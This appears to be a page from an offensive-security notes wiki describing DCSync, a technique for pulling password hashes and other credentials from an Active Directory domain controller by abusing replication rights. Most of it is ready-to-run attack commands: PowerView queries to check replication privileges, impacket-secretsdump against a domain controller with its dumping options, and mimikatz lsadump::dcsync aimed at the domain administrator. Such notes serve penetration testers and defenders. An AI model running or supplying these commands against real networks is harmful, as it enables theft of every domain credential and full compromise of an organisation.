DCSync

About

DCSync is a post-exploitation technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR), which is normally used to synchronize data between Domain Controllers.

If an attacker obtains the appropriate replication privileges in Active Directory (such as Replicating Directory Changes All), they can impersonate a Domain Controller and request a targeted sync of sensitive directory data — including password hashes, Kerberos tickets, and user credentials — without replicating the entire domain.

This results in full credential compromise over the network, without touching LSASS or memory on a domain controller.

Checking Privs

Group Membership Check

PS C:\> Get-DomainUser -Identity songbird | select samaccountname,objectsid,memberof,useraccountcontrol | fl

Rights Check

PS C:\> $sid = "S-1-5-21-blahblahblah-1164"
PS C:\> Get-ObjectAcl "DC=militech,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Reversible Encryption Check

PS C:\> Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# OR
PS C:\> Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Secretsdump

impacket-secretsdump -outputfile militech_hashes -just-dc MILITECH/songbird@13.13.13.13

Additional Parameters

  • -just-dc-ntlm - NTLM hashes only

  • -just-dc-user <USERNAME> - Extract data for certain user

  • -pwd-last-set - To see last time user changed password

  • -history - If we want to dump password history

  • -user-status - Check if user is disabled

Secretsdump would make few files each for each type of credentials:

  • Kerberos Tickets

  • NTLM Hashes

  • Cleartext Reversible Passwords (if option turned on, and because we are replicating DC, tool automaticly tooks also decryption keys and decrypt them)

Mimikatz

.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:MILITECH.LOCAL /user:MILITECH\administrator
PreviousDumpingNextMaking a Target List